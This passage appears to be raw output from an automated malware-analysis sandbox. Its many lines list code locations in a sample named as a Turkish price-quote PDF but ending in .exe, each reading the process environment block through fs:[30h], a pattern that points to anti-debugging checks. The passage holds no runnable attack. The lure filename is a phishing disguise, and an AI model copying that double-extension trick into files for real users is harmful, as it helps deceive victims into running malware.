Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD65D0 mov eax, dword ptr fs:[00000030h] 7_2_01AD65D0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h] 7_2_01B0E5CF
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E5CF mov eax, dword ptr fs:[00000030h] 7_2_01B0E5CF
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h] 7_2_01AFE53E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h] 7_2_01AFE53E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h] 7_2_01AFE53E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h] 7_2_01AFE53E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFE53E mov eax, dword ptr fs:[00000030h] 7_2_01AFE53E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0535 mov eax, dword ptr fs:[00000030h] 7_2_01AE0535
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B66500 mov eax, dword ptr fs:[00000030h] 7_2_01B66500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01BA4500 mov eax, dword ptr fs:[00000030h] 7_2_01BA4500
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h] 7_2_01B0656A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h] 7_2_01B0656A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0656A mov eax, dword ptr fs:[00000030h] 7_2_01B0656A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h] 7_2_01AD8550
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8550 mov eax, dword ptr fs:[00000030h] 7_2_01AD8550
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B044B0 mov ecx, dword ptr fs:[00000030h] 7_2_01B044B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5A4B0 mov eax, dword ptr fs:[00000030h] 7_2_01B5A4B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD64AB mov eax, dword ptr fs:[00000030h] 7_2_01AD64AB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8A49A mov eax, dword ptr fs:[00000030h] 7_2_01B8A49A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD04E5 mov ecx, dword ptr fs:[00000030h] 7_2_01AD04E5
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A430 mov eax, dword ptr fs:[00000030h] 7_2_01B0A430
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACC427 mov eax, dword ptr fs:[00000030h] 7_2_01ACC427
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h] 7_2_01ACE420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h] 7_2_01ACE420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ACE420 mov eax, dword ptr fs:[00000030h] 7_2_01ACE420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B56420 mov eax, dword ptr fs:[00000030h] 7_2_01B56420
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h] 7_2_01B08402
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h] 7_2_01B08402
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B08402 mov eax, dword ptr fs:[00000030h] 7_2_01B08402
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5C460 mov ecx, dword ptr fs:[00000030h] 7_2_01B5C460
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h] 7_2_01AFA470
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h] 7_2_01AFA470
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AFA470 mov eax, dword ptr fs:[00000030h] 7_2_01AFA470
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B8A456 mov eax, dword ptr fs:[00000030h] 7_2_01B8A456
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AC645D mov eax, dword ptr fs:[00000030h] 7_2_01AC645D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0E443 mov eax, dword ptr fs:[00000030h] 7_2_01B0E443
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF245A mov eax, dword ptr fs:[00000030h] 7_2_01AF245A
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD07AF mov eax, dword ptr fs:[00000030h] 7_2_01AD07AF
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B847A0 mov eax, dword ptr fs:[00000030h] 7_2_01B847A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B7678E mov eax, dword ptr fs:[00000030h] 7_2_01B7678E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h] 7_2_01AF27ED
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h] 7_2_01AF27ED
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AF27ED mov eax, dword ptr fs:[00000030h] 7_2_01AF27ED
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5E7E1 mov eax, dword ptr fs:[00000030h] 7_2_01B5E7E1
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h] 7_2_01AD47FB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD47FB mov eax, dword ptr fs:[00000030h] 7_2_01AD47FB
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01ADC7C0 mov eax, dword ptr fs:[00000030h] 7_2_01ADC7C0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B507C3 mov eax, dword ptr fs:[00000030h] 7_2_01B507C3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4C730 mov eax, dword ptr fs:[00000030h] 7_2_01B4C730
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h] 7_2_01B0273C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0273C mov ecx, dword ptr fs:[00000030h] 7_2_01B0273C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0273C mov eax, dword ptr fs:[00000030h] 7_2_01B0273C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h] 7_2_01B0C720
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C720 mov eax, dword ptr fs:[00000030h] 7_2_01B0C720
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B00710 mov eax, dword ptr fs:[00000030h] 7_2_01B00710
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C700 mov eax, dword ptr fs:[00000030h] 7_2_01B0C700
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0710 mov eax, dword ptr fs:[00000030h] 7_2_01AD0710
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD8770 mov eax, dword ptr fs:[00000030h] 7_2_01AD8770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE0770 mov eax, dword ptr fs:[00000030h] 7_2_01AE0770
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B54755 mov eax, dword ptr fs:[00000030h] 7_2_01B54755
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h] 7_2_01B12750
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12750 mov eax, dword ptr fs:[00000030h] 7_2_01B12750
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B5E75D mov eax, dword ptr fs:[00000030h] 7_2_01B5E75D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD0750 mov eax, dword ptr fs:[00000030h] 7_2_01AD0750
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0674D mov esi, dword ptr fs:[00000030h] 7_2_01B0674D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h] 7_2_01B0674D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0674D mov eax, dword ptr fs:[00000030h] 7_2_01B0674D
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B066B0 mov eax, dword ptr fs:[00000030h] 7_2_01B066B0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0C6A6 mov eax, dword ptr fs:[00000030h] 7_2_01B0C6A6
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h] 7_2_01AD4690
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD4690 mov eax, dword ptr fs:[00000030h] 7_2_01AD4690
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h] 7_2_01B506F1
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B506F1 mov eax, dword ptr fs:[00000030h] 7_2_01B506F1
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_01B4E6F2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_01B4E6F2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_01B4E6F2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E6F2 mov eax, dword ptr fs:[00000030h] 7_2_01B4E6F2
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_01B0A6C7
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A6C7 mov eax, dword ptr fs:[00000030h] 7_2_01B0A6C7
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD262C mov eax, dword ptr fs:[00000030h] 7_2_01AD262C
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEE627 mov eax, dword ptr fs:[00000030h] 7_2_01AEE627
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B06620 mov eax, dword ptr fs:[00000030h] 7_2_01B06620
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B08620 mov eax, dword ptr fs:[00000030h] 7_2_01B08620
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE260B mov eax, dword ptr fs:[00000030h] 7_2_01AE260B
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B12619 mov eax, dword ptr fs:[00000030h] 7_2_01B12619
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B4E609 mov eax, dword ptr fs:[00000030h] 7_2_01B4E609
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B02674 mov eax, dword ptr fs:[00000030h] 7_2_01B02674
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A660 mov eax, dword ptr fs:[00000030h] 7_2_01B0A660
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B0A660 mov eax, dword ptr fs:[00000030h] 7_2_01B0A660
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9866E mov eax, dword ptr fs:[00000030h] 7_2_01B9866E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B9866E mov eax, dword ptr fs:[00000030h] 7_2_01B9866E
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AEC640 mov eax, dword ptr fs:[00000030h] 7_2_01AEC640
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD09AD mov eax, dword ptr fs:[00000030h] 7_2_01AD09AD
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AD09AD mov eax, dword ptr fs:[00000030h] 7_2_01AD09AD
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B589B3 mov esi, dword ptr fs:[00000030h] 7_2_01B589B3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B589B3 mov eax, dword ptr fs:[00000030h] 7_2_01B589B3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01B589B3 mov eax, dword ptr fs:[00000030h] 7_2_01B589B3
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: 7_2_01AE29A0 mov eax, dword ptr fs:[00000030h] 7_2_01AE29A0
